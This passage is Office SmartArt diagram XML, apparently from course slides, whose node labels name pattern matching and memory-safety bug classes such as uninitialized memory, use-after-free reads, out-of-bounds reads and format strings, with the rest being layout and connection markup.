        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E414558F-19DC-4B4A-94D0-8F569A0DB277}" type="sibTrans" cxnId="{2EF151D8-7626-4158-838A-6ED6DD9C9770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFFDA297-A952-4592-A1C3-0FB4F1B3BE42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Pattern Matching</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9257CC8C-AAB1-42EB-A8AE-2FE21674B5E1}" type="parTrans" cxnId="{6ECF4820-0ECD-44FC-9B6F-144FCA33490D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ADD675E2-4566-43C9-8000-7BC65007ECD4}" type="sibTrans" cxnId="{6ECF4820-0ECD-44FC-9B6F-144FCA33490D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" type="pres">
      <dgm:prSet presAssocID="{938B1A96-22E4-485B-96F0-691B898CEAAD}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56C42561-1B2B-3143-93AF-C9A1E0E2B25B}" type="pres">
      <dgm:prSet presAssocID="{39FC8A06-35B2-4195-BED0-13EA5156D668}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C84FB5BE-0A7B-1943-A2C9-8C440C89BCDA}" type="pres">
      <dgm:prSet presAssocID="{7DD315CE-0298-4256-AE38-E69AA389B38A}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B652EDA-D011-4E42-9A75-B4BB634D452B}" type="pres">
      <dgm:prSet presAssocID="{0CD1F6B4-C757-4068-9817-22DCCAA0D1AE}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A4239C3D-C4C0-E145-8777-AFF56BBA2B5D}" type="pres">
      <dgm:prSet presAssocID="{E414558F-19DC-4B4A-94D0-8F569A0DB277}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{71343DB3-A64C-AE49-BAFB-AACF1BC2BC64}" type="pres">
      <dgm:prSet presAssocID="{DFFDA297-A952-4592-A1C3-0FB4F1B3BE42}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2B3C3E1D-8070-454B-86A7-05F4AB4DEF1C}" srcId="{938B1A96-22E4-485B-96F0-691B898CEAAD}" destId="{39FC8A06-35B2-4195-BED0-13EA5156D668}" srcOrd="0" destOrd="0" parTransId="{4539C87D-B19A-4CF8-BE59-685042FC329E}" sibTransId="{7DD315CE-0298-4256-AE38-E69AA389B38A}"/>
    <dgm:cxn modelId="{6ECF4820-0ECD-44FC-9B6F-144FCA33490D}" srcId="{938B1A96-22E4-485B-96F0-691B898CEAAD}" destId="{DFFDA297-A952-4592-A1C3-0FB4F1B3BE42}" srcOrd="2" destOrd="0" parTransId="{9257CC8C-AAB1-42EB-A8AE-2FE21674B5E1}" sibTransId="{ADD675E2-4566-43C9-8000-7BC65007ECD4}"/>
    <dgm:cxn modelId="{34DF9235-C645-AF4D-ADAA-224469FEC08A}" type="presOf" srcId="{DFFDA297-A952-4592-A1C3-0FB4F1B3BE42}" destId="{71343DB3-A64C-AE49-BAFB-AACF1BC2BC64}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{270D4B57-CF47-1840-A551-AA17AC15F6C3}" type="presOf" srcId="{938B1A96-22E4-485B-96F0-691B898CEAAD}" destId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2C083A6B-449A-034E-BB07-362F3C7F846D}" type="presOf" srcId="{0CD1F6B4-C757-4068-9817-22DCCAA0D1AE}" destId="{5B652EDA-D011-4E42-9A75-B4BB634D452B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{87F1AD7A-E48E-8B45-B721-E177A63DEC3C}" type="presOf" srcId="{39FC8A06-35B2-4195-BED0-13EA5156D668}" destId="{56C42561-1B2B-3143-93AF-C9A1E0E2B25B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2EF151D8-7626-4158-838A-6ED6DD9C9770}" srcId="{938B1A96-22E4-485B-96F0-691B898CEAAD}" destId="{0CD1F6B4-C757-4068-9817-22DCCAA0D1AE}" srcOrd="1" destOrd="0" parTransId="{812E1A04-BF4C-4B4B-AB46-CAE5FF53CDC2}" sibTransId="{E414558F-19DC-4B4A-94D0-8F569A0DB277}"/>
    <dgm:cxn modelId="{278CD5D6-F6A1-CA48-AD12-509100B96361}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{56C42561-1B2B-3143-93AF-C9A1E0E2B25B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F695C5C9-EA83-3347-947E-C3449AC4F19E}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{C84FB5BE-0A7B-1943-A2C9-8C440C89BCDA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{868E4221-F0F9-B44C-BD48-DCDCEF286BCE}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{5B652EDA-D011-4E42-9A75-B4BB634D452B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D1F33643-7BB3-C948-9732-C55CF0EB2E89}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{A4239C3D-C4C0-E145-8777-AFF56BBA2B5D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{0D39BB21-E6FD-0749-A1F3-A90AE50FA9D6}" type="presParOf" srcId="{49F38659-4AF0-0D4A-B4B1-D75D6C9BC221}" destId="{71343DB3-A64C-AE49-BAFB-AACF1BC2BC6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F6A9B7-0821-4D4C-A774-57913E395A06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188FA5-BEDE-4083-83F6-C5BBAE8311F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Uninitialized Memory </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0801B4E-8E79-447B-B15F-E57116B638C1}" type="parTrans" cxnId="{C2380AC0-A0B1-4B92-90A4-1240CD79AE0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F951DDB-DFE6-4EE9-ABFC-9E1EF95287EF}" type="sibTrans" cxnId="{C2380AC0-A0B1-4B92-90A4-1240CD79AE0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86804358-EDC3-43FB-88BB-D37047916BA9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use after free read</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A450CC1F-514C-4805-B489-45B5329F1F7C}" type="parTrans" cxnId="{F85391AD-CB70-4FEF-9E6A-818D7E2F9596}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{491B8803-CDE5-4B3F-87D6-46F34B6FAC7C}" type="sibTrans" cxnId="{F85391AD-CB70-4FEF-9E6A-818D7E2F9596}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Out of bounds read</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F2B32DA-4F33-4C84-AF5B-99FF291C98BE}" type="parTrans" cxnId="{E3C035EC-426A-4A80-A4B9-35E92822EF99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5653F958-935C-4D49-9258-4550E40E0EC9}" type="sibTrans" cxnId="{E3C035EC-426A-4A80-A4B9-35E92822EF99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11E4C774-22A4-F041-9F97-454F5E2E07AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Others (not talked about in course) i.e. format strings</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CDB9A49-0676-1D47-9A4E-502B5E2F229B}" type="parTrans" cxnId="{4C77C8EF-64AB-B442-8727-57D5BA990334}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{638BEF39-AAD8-DC4D-9902-B42210E35AC1}" type="sibTrans" cxnId="{4C77C8EF-64AB-B442-8727-57D5BA990334}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" type="pres">
      <dgm:prSet presAssocID="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C1F1E34-0B7A-8B41-9D06-FCFF76D7EBB4}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CCDA257E-750D-B142-AF73-AFB864DAD05D}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6F8D182-4098-A040-84EA-BF13153C3C00}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F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698BB2-8180-D14C-BF77-492AD5D66461}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4F4FF91-5414-5D44-8797-C579B022DE73}" type="pres">
      <dgm:prSet presAssocID="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{55BF737C-AC97-8945-87D8-8689C951FB7E}" type="pres">
      <dgm:prSet presAssocID="{1F951DDB-DFE6-4EE9-ABFC-9E1EF95287EF}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99B86EA1-3B4F-BD4C-9DEA-924C7FC19CF4}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA9}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{94912B45-798C-0F43-A383-09A3E298E6C0}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA9}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC257186-8BE0-314E-99F1-B94DBE6E2488}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA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065B2F-00BD-BF4B-9A28-D22B4389B51F}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA9}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B2B2437E-A3F0-614E-9862-B6D2D1DAF289}" type="pres">
      <dgm:prSet presAssocID="{86804358-EDC3-43FB-88BB-D37047916BA9}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FCC18504-3C26-6646-AD73-F3DB3E3E63C0}" type="pres">
      <dgm:prSet presAssocID="{491B8803-CDE5-4B3F-87D6-46F34B6FAC7C}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{258AA88E-4A35-2B49-A906-BDA69A2507D4}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E08B2B21-1F93-E245-8A49-11A23BA58DF2}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF93BF18-2193-C44A-A20B-65338489AC29}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78C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8A9B79-BB95-8647-BA99-BB22EB2B440D}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{89AD06F3-BF00-7145-8B03-1BCA279280F8}" type="pres">
      <dgm:prSet presAssocID="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2B2B855D-1F8C-4E4B-BC6C-39DE7FBBE637}" type="pres">
      <dgm:prSet presAssocID="{5653F958-935C-4D49-9258-4550E40E0EC9}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46D12188-12F8-2E46-8180-05CFD4EF3FFA}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FD4B9195-C049-1542-BA91-309152EF96A7}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6E6396B2-B749-A146-97EF-77F9C856450F}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07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132D0F2-93C3-9E43-BF2E-2BBCBD22740C}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{120E51CA-335C-E044-B1D4-4611BAE02C76}" type="pres">
      <dgm:prSet presAssocID="{11E4C774-22A4-F041-9F97-454F5E2E07A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6AC220-9023-5543-BB54-8390414F9578}" type="presOf" srcId="{86804358-EDC3-43FB-88BB-D37047916BA9}" destId="{DC257186-8BE0-314E-99F1-B94DBE6E2488}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4A091E4B-7CA1-0E4C-8A1B-AF49AE620D75}" type="presOf" srcId="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" destId="{CCDA257E-750D-B142-AF73-AFB864DAD05D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DB142358-D5E0-3D43-B8F8-7ED12D905FD8}" type="presOf" srcId="{86804358-EDC3-43FB-88BB-D37047916BA9}" destId="{94912B45-798C-0F43-A383-09A3E298E6C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CB720E6A-996E-E545-9A17-CCD5F5D30955}" type="presOf" srcId="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" destId="{FD4B9195-C049-1542-BA91-309152EF96A7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DCFBE489-07C8-9547-990D-D562589CF7FC}" type="presOf" srcId="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" destId="{E08B2B21-1F93-E245-8A49-11A23BA58DF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F85391AD-CB70-4FEF-9E6A-818D7E2F9596}" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{86804358-EDC3-43FB-88BB-D37047916BA9}" srcOrd="1" destOrd="0" parTransId="{A450CC1F-514C-4805-B489-45B5329F1F7C}" sibTransId="{491B8803-CDE5-4B3F-87D6-46F34B6FAC7C}"/>
    <dgm:cxn modelId="{4B1954B8-2F04-DB4C-95E2-7A410327BBF7}" type="presOf" srcId="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" destId="{D6F8D182-4098-A040-84EA-BF13153C3C00}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{84A883BB-9964-2D4E-907D-23EDDFE283D6}" type="presOf" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C2380AC0-A0B1-4B92-90A4-1240CD79AE0B}" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{E0188FA5-BEDE-4083-83F6-C5BBAE8311F6}" srcOrd="0" destOrd="0" parTransId="{F0801B4E-8E79-447B-B15F-E57116B638C1}" sibTransId="{1F951DDB-DFE6-4EE9-ABFC-9E1EF95287EF}"/>
    <dgm:cxn modelId="{38798AE0-B358-4347-8347-41922B692642}" type="presOf" srcId="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" destId="{DF93BF18-2193-C44A-A20B-65338489AC29}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C5421FEA-463E-B94A-9AC1-7F1AB48A757C}" type="presOf" srcId="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" destId="{6E6396B2-B749-A146-97EF-77F9C856450F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E3C035EC-426A-4A80-A4B9-35E92822EF99}" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{BE5FD18B-1C7C-4785-B389-EF6F9EA78CBD}" srcOrd="2" destOrd="0" parTransId="{9F2B32DA-4F33-4C84-AF5B-99FF291C98BE}" sibTransId="{5653F958-935C-4D49-9258-4550E40E0EC9}"/>
    <dgm:cxn modelId="{4C77C8EF-64AB-B442-8727-57D5BA990334}" srcId="{2AF6A9B7-0821-4D4C-A774-57913E395A06}" destId="{11E4C774-22A4-F041-9F97-454F5E2E07AC}" srcOrd="3" destOrd="0" parTransId="{7CDB9A49-0676-1D47-9A4E-502B5E2F229B}" sibTransId="{638BEF39-AAD8-DC4D-9902-B42210E35AC1}"/>
    <dgm:cxn modelId="{8BE998FE-43B0-7D4C-B0FF-14A81CEDBFD5}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{3C1F1E34-0B7A-8B41-9D06-FCFF76D7EBB4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7933543E-9F37-C84B-9F05-A2960ACB840D}" type="presParOf" srcId="{3C1F1E34-0B7A-8B41-9D06-FCFF76D7EBB4}" destId="{CCDA257E-750D-B142-AF73-AFB864DAD05D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{967A1DD0-38BD-A84B-AFFE-A1D0B232FAC3}" type="presParOf" srcId="{3C1F1E34-0B7A-8B41-9D06-FCFF76D7EBB4}" destId="{D6F8D182-4098-A040-84EA-BF13153C3C00}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3A247939-6A04-D74C-B4FB-755E5A16EF6E}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{55698BB2-8180-D14C-BF77-492AD5D66461}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{88488B5B-90DD-BF4A-A40A-A7CE5E818F23}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{C4F4FF91-5414-5D44-8797-C579B022DE73}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8705D888-73C6-4341-91C7-6B5805A01B3B}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{55BF737C-AC97-8945-87D8-8689C951FB7E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BEFE9410-1D72-1C4E-B217-F45BEE61B052}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{99B86EA1-3B4F-BD4C-9DEA-924C7FC19CF4}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3F3906DA-EBED-4746-9FC1-DB65424B86E3}" type="presParOf" srcId="{99B86EA1-3B4F-BD4C-9DEA-924C7FC19CF4}" destId="{94912B45-798C-0F43-A383-09A3E298E6C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5BC94DED-3EE1-3E49-8B98-7F45BFEED6C0}" type="presParOf" srcId="{99B86EA1-3B4F-BD4C-9DEA-924C7FC19CF4}" destId="{DC257186-8BE0-314E-99F1-B94DBE6E2488}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CB884E75-C49E-7842-8483-B1D36F875C1E}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{B5065B2F-00BD-BF4B-9A28-D22B4389B51F}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DBB7AA9E-8140-8743-A536-6652F0E87D45}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{B2B2437E-A3F0-614E-9862-B6D2D1DAF289}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F1C44F07-4B5D-B148-A34F-E1993C65FFFF}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{FCC18504-3C26-6646-AD73-F3DB3E3E63C0}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A8D2EBC2-8F2C-9141-ABF5-4877D119FAC5}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{258AA88E-4A35-2B49-A906-BDA69A2507D4}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EE5543E8-C492-9F42-9F14-7BB146AE6FF4}" type="presParOf" srcId="{258AA88E-4A35-2B49-A906-BDA69A2507D4}" destId="{E08B2B21-1F93-E245-8A49-11A23BA58DF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5A4CBDDD-16FC-BC48-8606-AA87234E74D8}" type="presParOf" srcId="{258AA88E-4A35-2B49-A906-BDA69A2507D4}" destId="{DF93BF18-2193-C44A-A20B-65338489AC29}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F3674B0F-5BE2-DF4D-803B-80AEA42518BE}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{598A9B79-BB95-8647-BA99-BB22EB2B440D}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1D6CAA6B-C79E-864C-8DE3-AC519DEFCDE1}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{89AD06F3-BF00-7145-8B03-1BCA279280F8}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0A054B3C-8E47-3F45-BC94-E6BEA3C25738}" type="presParOf" srcId="{A6888572-B948-4F4D-BE6D-C3F3179153BD}" destId="{2B2B855D-1F8C-4E4B-BC6C-39DE7FBBE637}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
